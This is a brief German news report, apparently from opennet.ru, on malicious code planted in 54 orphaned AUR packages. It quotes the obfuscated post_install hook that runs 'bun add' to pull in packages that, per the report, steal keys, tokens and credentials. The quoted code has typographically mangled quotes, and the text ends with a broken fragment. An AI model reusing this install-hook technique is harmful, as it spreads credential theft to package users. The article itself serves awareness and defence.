Trotz der Maßnahmen, die von den Entwicklern von Arch Linux ergriffen wurden, ist das Einfügen von schädlichem Code in die AUR-Repositories (Arch User Repository) nicht gestoppt worden. Vor einigen Stunden wurde schädlicher Code in weiteren 54 Paketen eingefügt, die ohne Unterstützung verbleiben (Historie der Rücknahme schädlicher Änderungen). Im Gegensatz zu den Angriffen von vorgestern wurde diesmal die Plattform bun anstelle des Paketmanagers npm verwendet, um schädliche Abhängigkeiten zu installieren. Um die implementierten Filter zu umgehen, wird ein obfuszierter String in die Funktion post_install eingefügt, der den Befehl "bun add" aufruft, um Pakete mit schädlichem Code zu installieren, die Schlüssel, Tokens und Anmeldeinformationen scannen und an ein externes Ziel senden. der Server keys, tokens und Anmeldeinformationen.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Quelle: opennet.ru
